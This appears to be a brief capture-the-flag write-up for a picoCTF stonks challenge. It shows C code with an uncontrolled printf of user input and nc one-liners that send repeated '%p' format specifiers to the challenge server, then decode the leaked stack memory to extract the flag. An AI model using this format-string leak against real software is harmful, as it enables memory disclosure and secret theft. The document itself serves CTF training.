make and run it:
gcc vuln.c
If the flag is not found locally, it must be on the remote server.
python3 -c 'print("A" * 200)' > api
it works fine.
char *user_buf = malloc(300 + 1); //Allocates memory
printf("What is your API token?\n"); //Prints input prompt
scanf("%300s", user_buf); //Reads in the user input and stores in user_buf
printf("Buying stonks with token:\n"); //Prints info
printf(user_buf); //Outputs user_buff [VULNERABLE!!]As we can see, the function type is not specified.
printf(user_buf) Will be affected by the format string.
Remote Attack:
python3 -c 'print("1\n" + "%p." * 50)' | nc mercury.picoctf.net 33411 | tr "." "\n" | xxd -r -p | strings -n1
python3 -c 'print("1\n" + "%p." * 50)' | nc mercury.picoctf.net 33411 | tr "." "\n" | while read line; do echo $line | xxd -r -p | strings -n1 | rev; done | tr -d "\n" | grep -oE "picoCTF{.*}"
